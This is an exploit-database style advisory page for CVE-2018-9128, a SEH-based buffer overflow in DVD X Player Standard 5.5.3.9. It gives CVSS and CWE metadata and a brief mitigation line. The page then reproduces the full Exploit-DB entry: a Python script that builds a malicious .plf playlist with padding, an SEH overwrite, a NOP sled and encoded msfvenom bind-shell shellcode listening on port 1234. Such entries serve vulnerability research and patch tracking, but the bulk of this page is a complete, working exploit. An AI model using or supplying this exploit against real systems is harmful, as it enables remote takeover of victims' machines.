Buffer Overflow on DVD X Player Standard 5.5.3.9

vendor:

DVD X Player Standard

by:

Prasenjit Kanti Paul

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: DVD X Player Standard

Affected Version From: 5.5.3.9

Affected Version To: 5.5.3.9

Patch Exists: NO

Related CWE: CVE-2018-9128

CPE: a:dvd-x-player:standard:5.5.3.9

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3 x86

2018

Buffer Overflow on DVD X Player Standard 5.5.3.9

The exploit involves a buffer overflow vulnerability in DVD X Player Standard version 5.5.3.9. By sending a specially crafted payload, an attacker can overwrite the SEH (Structured Exception Handler) to gain control of the program execution flow. This can lead to remote code execution and potential compromise of the system. The exploit has been tested on Windows XP SP3 x86.

Mitigation:

Update to a patched version of DVD X Player Standard. Disable unnecessary features and services.

Source

Exploit-DB raw data:

######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################

# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes


file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100

buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"

file.write(buffer + next_seh + seh + nops + buf)
file.close()